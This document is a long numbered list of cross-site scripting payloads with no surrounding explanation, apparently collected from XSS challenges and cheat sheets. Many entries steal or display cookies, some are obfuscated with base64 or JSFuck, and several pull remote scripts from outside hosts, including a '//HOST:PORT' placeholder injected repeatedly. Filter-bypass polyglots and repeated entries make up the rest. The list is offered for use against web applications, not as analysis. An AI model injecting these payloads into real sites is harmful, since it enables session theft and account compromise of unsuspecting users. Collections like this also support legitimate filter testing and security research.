  909. image <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #

    DSAD

  910. image <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#

    DSAD

  911. image <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>#

    DSAD

  912. image <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#

    DSAD

  913. image <script for=document event=onreadystatechange>getElementById('safe123').click()</script>

    DSAD

  914. image <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

    DSAD

  915. image <iframe src="404" onload="frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  916. image <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>

    DSAD

  917. image <iframe src="404" onload="content.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  918. image <iframe src="404" onload="self.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  919. image <iframe src="404" onload="top.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  920. image <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#

    DSAD

  921. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  922. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  923. image <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href="javascript:\"<script>var%20xhr%20%3D%20new%20XMLHttpRequest()%3Bxhr.open('GET'%2C%20'http%3A%2F%2Fhtml5sec.org%2Fxssme2'%2C%20true)%3Bxhr.onload%20%3D%20function()%20%7B%20alert(xhr.responseText.match(%2Fcookie%20%3D%20'(.*%3F)'%2F)%5B1%5D)%20%7D%3Bxhr.send()%3B<\/script>\"") autofocus></textarea>

    DSAD

  924. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  925. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  926. image <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  927. image <script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  928. image <object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">

    DSAD

  929. image <textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

    DSAD

  930. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  931. image <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

    DSAD

  932. image <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>

    DSAD

  933. image <a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>

    DSAD

  934. image <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  935. image <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  936. image Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>

    DSAD

  937. image <a href="javascript:\u0061l&#101rt(1)"><button>

    DSAD

  938. image <div onmouseover='alert(1)'>DIV</div>

    DSAD

  939. image <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

    DSAD

  940. image <a href="jAvAsCrIpT:alert(1)">X</a>

    DSAD

  941. image <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

    DSAD

  942. image <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

    DSAD

  943. image <var onmouseover="prompt(1)">On Mouse Over</var>?

    DSAD

  944. image <a href=javascript:alert(document.cookie)>Click Here</a>

    DSAD

  945. image <img src="/" =_=" title="onerror='prompt(1)'">

    DSAD

  946. image <%<!--'%><script>alert(1);</script -->

    DSAD

  947. image <script src="data:text/javascript,alert(1)"></script>

    DSAD

  951. image <input value=<><iframe/src=javascript:confirm(1)

    DSAD

  952. image <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?

    DSAD

  953. image <input type="text" value=``<div/onmouseover='alert(1)'>X</div>

    DSAD

  956. image <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>

    DSAD

  958. image <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

    DSAD

  959. image <meta http-equiv="refresh" content="0;javascript:alert(1)"/>?

    DSAD

  960. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  961. image <svg contentScriptType=text/vbs><script>MsgBox+1

    DSAD

  962. image <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

    DSAD

  963. image <a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a

    DSAD

  964. image <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

    DSAD

  965. image <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

    DSAD

  966. image <script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/

    DSAD

  967. image <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????

    DSAD

  968. image <object data=javascript:\u0061l&#101rt(1)>

    DSAD

  969. DSAD

  970. image <body/onload=<!-->&#10alert(1)>

    DSAD

  971. image <script itworksinallbrowsers>/*<script* */alert(1)</script ?

    DSAD

  973. image <svg><script>//
confirm(1);</script </svg>

    DSAD

  974. image <svg><script onlypossibleinopera:-)> alert(1)

    DSAD

  975. image <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

    DSAD

  977. image <div/onmouseover='alert(1)'> style="x:">

    DSAD

  978. image <--`<img/src=` onerror=alert(1)> --!>

    DSAD

  979. image <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?

    DSAD

  980. image <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

    DSAD

  981. image "><img src=x onerror=window.open('https://www.google.com/');>

    DSAD

  982. image <form><button formaction=javascript:alert(1)>CLICKME

    DSAD

  983. image <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

    DSAD

  984. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  985. image <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

    DSAD

  986. image <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    DSAD

  987. DSAD

  1420. innerHTML=location.hash>#<script>alert(1)</script>

  1439. <x contenteditable onkeypress=alert(1)>press any key!

  1473. <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

  1475. */alert(1)">'onload="/*<svg/1='

  1477. `-alert(1)">'onload="`<svg/1='

  1478. */</script>'>alert(1)/*<script/1='

  1485. <math><brute href=javascript:alert(1)>click

  1486. <isindex action=javascript:alert(1) type=submit value=click>

  1487. <form action=javascript:alert(1)><input type=submit>

  1488. <form><button formaction=javascript:alert(1)>click

  1489. <form><input formaction=javascript:alert(1) type=submit value=click>

  1490. <form><input formaction=javascript:alert(1) type=image value=click>

  1491. <form><input formaction=javascript:alert(1) type=image src=SOURCE>

  1492. <isindex formaction=javascript:alert(1) type=submit value=click>

  1494. <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

  1495. <svg><script xlink:href=data:,alert(1) />

  1496. <math><brute xlink:href=javascript:alert(1)>click

  1497. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

  1503. "><img src=1 onerror=alert(1)>.gif

  1504. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

  1505. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

  1507. "><script src=data:,alert(1)//

  1508. <script src="//brutelogic.com.br/1.js#

  1509. "><script src=//brutelogic.com.br/1.js#

  1510. <link rel=import href="data:text/html,<script>alert(1)</script>

  1511. <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

  1513. "><link rel=import href=data:text/html,<script>alert(1)</script>

  1517. <body onhashchange=alert(1)><a href=#x>click this!#x

  1518. <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

  1519. <body onscroll=alert(1)><br><br><br><br>

  1525. <video onloadstart=alert(1)><source>

  1528. <form onsubmit=alert(1)><input type=submit>

  1529. <select onchange=alert(1)><option>1<option>2

  1530. <menu id=x contextmenu=x onshow=alert(1)>right click me!

  1532. <scr<script>ipt>alert('XSS')</scr<script>ipt>

  1533. "><script>alert('XSS')</script>

  1535. "><script>alert(String.fromCharCode(88,83,83))</script>

  1536. <img src=x onerror=alert(String.fromCharCode(88,83,83));>

  1537. <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

  1539. "><img src=x onerror=alert('XSS');>

  1540. "><img src=x onerror=alert(String.fromCharCode(88,83,83));>

  1545. "><svg/onload=alert(String.fromCharCode(88,83,83))>

  1551. <video><source onerror="javascript:alert(1)">

  1554. <video src=_ onloadstart="alert(1)">

  1555. <details/open/ontoggle="alert`1`">

  1558. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

  1559. <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

  1560. data:text/html,<script>alert(0)</script>

  1562. jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

  1563. ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http: //i.imgur.com/P8mL8.jpg">

  1564. " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

  1565. ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

  1566. javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

  1567. javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

  1568. javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

  1569. javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

  1570. javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

  1571. javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

  1572. javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

  1573. --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

  1574. /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

  1575. javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

  1576. /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

  1579. <script>window['alert'](document['domain'])<script>

  1581. <script>window['alert'](0)</script>

  1582. <script>parent['alert'](1)</script>

  1583. <script>self['alert'](2)</script>

  1584. <script>top['alert'](3)</script>

  1602. <x contenteditable onkeypress=alert(1)>press any key!

  1636. <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

  1640. */alert(1)">'onload="/*<svg/1='

  1641. `-alert(1)">'onload="`<svg/1='

  1642. */</script>'>alert(1)/*<script/1='

  1648. <math><brute href=javascript:alert(1)>click

  1649. <form action=javascript:alert(1)><input type=submit>

  1650. <isindex action=javascript:alert(1) type=submit value=click>

  1651. <form><button formaction=javascript:alert(1)>click

  1652. <form><input formaction=javascript:alert(1) type=image value=click>

  1653. <form><input formaction=javascript:alert(1) type=submit value=click>

  1654. <form><input formaction=javascript:alert(1) type=image src=SOURCE>

  1655. <isindex formaction=javascript:alert(1) type=submit value=click>

  1657. <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

  1658. <svg><script xlink:href=data:,alert(1) />

  1659. <math><brute xlink:href=javascript:alert(1)>click

  1660. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

  1665. "><img src=1 onerror=alert(1)>.gif

  1666. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

  1667. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

  1669. <script src="//brutelogic.com.br/1.js#

  1670. "><script src=data:,alert(1)//

  1671. "><script src=//brutelogic.com.br/1.js#

  1672. <link rel=import href="data:text/html,<script>alert(1)</script>

  1674. "><link rel=import href=data:text/html,<script>alert(1)</script>

  1676. <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

  1680. <body onhashchange=alert(1)><a href=#x>click this!#x

  1681. <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

  1682. <body onscroll=alert(1)><br><br><br><br>

  1688. <video onloadstart=alert(1)><source>

  1691. <form onsubmit=alert(1)><input type=submit>

  1692. <select onchange=alert(1)><option>1<option>2

  1693. <menu id=x contextmenu=x onshow=alert(1)>right click me!

  1694. <script>\u0061\u006C\u0065\u0072\u0074(1)</script>

  1695. <img src="1" onerror="alert(1)" />

  1696. <iframe src="javascript:alert(1)"></iframe>

  1697. <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

  1698. <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

  1701. <script ~~~>confirm(1)</script ~~~>

  1702. <script>$=1,\u0061lert($)</script>

  1703. <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>

  1704. <</script/script><script ~~~>\u0061lert(1)</script ~~~>

  1705. </style></scRipt><scRipt>alert(1)</scRipt>

  1706. <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>

  1707. <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

  1708. <svg><x><script>alert('1'&#41</x>

  1709. <iframe src=""/srcdoc='<svg onload=alert(1)>'>

  1710. '"--></style></script><script>shadowlabs(0x000045)</script>

  1711. <<scr\0ipt/src=http://xss.com/xss.js></script

  1713. "><iframe src="http://google.com"% 3E

  1714. '"--></style></script><script>RWAR(0x00010E)</script>

  1715. '<script>window.onload=function(){document.forms[0].message.value='1';}</script>

  1716. x”</title><img src=x onerror=alert(1)>

  1717. <script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>

  1718. <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

  1719. <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>

  1720. <script>(function() {var event = document.createEvent("MouseEvents");event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>

  1721. <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

  1722. <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

  1723. <script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>

  1724. <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>

  1725. <script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>

  1726. <script> var xdr = new ActiveXObject("Microsoft.XMLHTTP"); xdr.open("get", "/xssme2?a=1", true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*?)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>

